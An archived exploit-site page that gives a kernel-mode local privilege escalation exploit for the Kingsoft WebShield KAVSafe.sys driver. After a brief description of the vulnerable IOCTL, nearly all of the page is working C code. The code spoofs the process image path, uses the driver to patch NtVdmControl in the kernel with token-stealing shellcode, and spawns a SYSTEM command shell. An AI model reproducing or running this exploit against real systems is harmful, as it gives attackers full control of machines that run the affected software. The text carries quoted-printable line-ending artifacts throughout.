AOH :: HP Unsorted K :: B1A-1125.HTM

Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Priv Escalation



Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability



=0D
 Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability=0D
VULNERABLE PRODUCTS=0D
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)=0D
 =0D
Signature Date: 2010-5-23 2:33:54=0D
 =0D
And=0D
 =0D
KAVSafe.sys <= 2010.4.14.609=0D
Signature Date:2010-4-14 13:42:26=0D
 =0D
DETAILS:=0D
Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data=0D
 =0D
EXPLOIT CODE:=0D
 =0D
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)=0D
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(=0D
  HANDLE ProcessHandle,=0D
  DWORD ProcessInformationClass,=0D
  PVOID ProcessInformation,=0D
  ULONG ProcessInformationLength,=0D
  PULONG ReturnLength=0D
    );=0D
 =0D
typedef struct _STRING {=0D
    USHORT Length;=0D
    USHORT MaximumLength;=0D
    PCHAR Buffer;=0D
} STRING;=0D
typedef STRING *PSTRING;=0D
typedef struct _RTL_DRIVE_LETTER_CURDIR {=0D
    USHORT Flags;=0D
    USHORT Length;=0D
    ULONG TimeStamp;=0D
    STRING DosPath;=0D
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;=0D
typedef struct _UNICODE_STRING {=0D
    USHORT Length;=0D
    USHORT MaximumLength;=0D
    PWSTR  Buffer;=0D
} UNICODE_STRING;=0D
typedef UNICODE_STRING *PUNICODE_STRING;=0D
typedef const UNICODE_STRING *PCUNICODE_STRING;=0D
#define RTL_MAX_DRIVE_LETTERS 32=0D
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001=0D
typedef struct _CURDIR {=0D
    UNICODE_STRING DosPath;=0D
    HANDLE Handle;=0D
} CURDIR, *PCURDIR;=0D
typedef struct _RTL_USER_PROCESS_PARAMETERS {=0D
    ULONG MaximumLength;=0D
    ULONG Length;=0D
    ULONG Flags;=0D
    ULONG DebugFlags;=0D
    HANDLE ConsoleHandle;=0D
    ULONG  ConsoleFlags;=0D
    HANDLE StandardInput;=0D
    HANDLE StandardOutput;=0D
    HANDLE StandardError;=0D
    CURDIR CurrentDirectory;        // ProcessParameters=0D
    UNICODE_STRING DllPath;         // ProcessParameters=0D
    UNICODE_STRING ImagePathName;   // ProcessParameters=0D
    UNICODE_STRING CommandLine;     // ProcessParameters=0D
    PVOID Environment;              // NtAllocateVirtualMemory=0D
    ULONG StartingX;=0D
    ULONG StartingY;=0D
    ULONG CountX;=0D
    ULONG CountY;=0D
    ULONG CountCharsX;=0D
    ULONG CountCharsY;=0D
    ULONG FillAttribute;=0D
    ULONG WindowFlags;=0D
    ULONG ShowWindowFlags;=0D
    UNICODE_STRING WindowTitle;     // ProcessParameters=0D
    UNICODE_STRING DesktopInfo;     // ProcessParameters=0D
    UNICODE_STRING ShellInfo;       // ProcessParameters=0D
    UNICODE_STRING RuntimeData;     // ProcessParameters=0D
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];=0D
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;=0D
typedef struct _PEB {=0D
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the=0D
    BOOLEAN ReadImageFileExecOptions;   //=0D
    BOOLEAN BeingDebugged;              //=0D
    BOOLEAN SpareBool;                  //=0D
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.=0D
    PVOID ImageBaseAddress;=0D
    PVOID Ldr;=0D
    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;=0D
} PEB, *PPEB;=0D
typedef LONG KPRIORITY;=0D
typedef struct _PROCESS_BASIC_INFORMATION {=0D
    LONG ExitStatus;=0D
    PVOID PebBaseAddress;=0D
    ULONG_PTR AffinityMask;=0D
    KPRIORITY BasePriority;=0D
    ULONG_PTR UniqueProcessId;=0D
    ULONG_PTR InheritedFromUniqueProcessId;=0D
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;=0D
typedef struct {=0D
    ULONG   Unknown1;=0D
    ULONG   Unknown2;=0D
    PVOID   Base;=0D
    ULONG   Size;=0D
    ULONG   Flags;=0D
    USHORT  Index;=0D
    USHORT  NameLength;=0D
    USHORT  LoadCount;=0D
    USHORT  PathLength;=0D
    CHAR    ImageName[256];=0D
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;=0D
 =0D
typedef struct {=0D
    ULONG   Count;=0D
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];=0D
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;=0D
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (=0D
   LONG SystemInformationClass,=0D
 PVOID SystemInformation,=0D
   ULONG SystemInformationLength,=0D
   PULONG ReturnLength=0D
    );=0D
 =0D
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )=0D
typedef LONG (WINAPI *PNT_VDM_CONTROL) (=0D
   ULONG Service,=0D
   PVOID ServiceData=0D
    );=0D
VOID __declspec(naked) R0ShellCodeXP()=0D
{=0D
__asm=0D
{=0D
mov eax,0xffdff124=0D
mov eax,[eax]=0D
mov esi ,dword ptr[eax+0x220]=0D
mov eax,esi=0D
searchxp:=0D
mov eax,dword ptr[eax+0x88]=0D
sub eax,0x88=0D
mov edx,dword ptr[eax+0x84]=0D
cmp edx,4=0D
jnz searchxp=0D
mov eax,dword ptr[eax+0xc8]=0D
mov dword ptr[esi + 0xc8] , eax=0D
ret 8=0D
}=0D
}=0D
VOID NopNop()=0D
{=0D
printf("nop!\n");=0D
}=0D
 =0D
#include "malloc.h"=0D
int main(int argc, char* argv[])=0D
{=0D
 =0D
printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"=0D
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"=0D
"2010-5-23\n"=0D
"By Lincoin \n\nPress Enter");=0D
HKEY hkey ;=0D
WCHAR InstallPath[MAX_PATH];=0D
DWORD datatype ;=0D
DWORD datasize = MAX_PATH * sizeof(WCHAR);=0D
ULONG oldlen ;=0D
PVOID pOldBufferData = NULL ;=0D
 =0D
if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)=0D
{=0D
if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)=0D
{=0D
RegCloseKey(hkey);=0D
printf("KSWebShield not installed\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
 =0D
RegCloseKey(hkey);=0D
}=0D
else=0D
{=0D
printf("KSWebShield not installed\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
wcscat(InstallPath , L"\\kavinst.exe");=0D
 =0D
 =0D
PROCESS_BASIC_INFORMATION pbi ;=0D
 =0D
PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;=0D
pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");=0D
pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);=0D
 =0D
PPEB peb ;=0D
 =0D
peb = (PPEB)pbi.PebBaseAddress;=0D
oldlen = peb->ProcessParameters->ImagePathName.Length;=0D
peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);=0D
pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);=0D
RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);=0D
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );=0D
HANDLE hdev = CreateFile("\\\\.\\KAVSafe" ,=0D
FILE_READ_ATTRIBUTES ,=0D
FILE_SHARE_READ ,=0D
0,=0D
OPEN_EXISTING ,=0D
0,=0D
0);=0D
 =0D
if (hdev==INVALID_HANDLE_VALUE)=0D
{=0D
printf("cannot open device %u\n", GetLastError());=0D
getchar();=0D
return 0 ;=0D
}=0D
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);=0D
peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;=0D
 =0D
PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ;=0D
pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");=0D
X_SYSTEM_MODULE_INFORMATION sysmod ;=0D
HMODULE KernelHandle ;=0D
 =0D
pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);=0D
    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);=0D
if (KernelHandle == 0 )=0D
{=0D
printf("cannot load ntoskrnl!\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");=0D
 =0D
if (pNtVdmControl == 0 )=0D
{=0D
printf("cannot find NtVdmControl!\n");=0D
getchar();=0D
return 0 ;=0D
}=0D
pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  );=0D
 =0D
printf("NtVdmControl = %08x" , pNtVdmControl );=0D
getchar();=0D
ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;=0D
ULONG pShellCode = (ULONG)R0ShellCodeXP;=0D
 =0D
 =0D
PVOID Data = malloc(0x48 + ShellCodeSize);=0D
 =0D
CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);=0D
CHAR ModuleName[68]= "ntoskrnl.exe" ;=0D
RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));=0D
*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;=0D
*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;=0D
ULONG btr ;=0D
if (!DeviceIoControl(hdev ,=0D
IOCTL_HOTPATCH_KERNEL_MODULE ,=0D
Data ,=0D
0x48 + ShellCodeSize ,=0D
NULL ,=0D
0,=0D
&btr , 0=0D
))=0D
{=0D
printf("cannot device io control!%u\n" , GetLastError());=0D
getchar();=0D
return 0;=0D
}=0D
 =0D
CloseHandle(hdev);=0D
 =0D
PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");=0D
pR3NtVdmControl(0,0);=0D
WinExec("cmd.exe" , SW_SHOW);=0D
printf("OK!\n ");=0D
 =0D
getchar();=0D
 =0D
return 0;=0D
}=0D
 =0D
 =0D
 =0D
      =0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.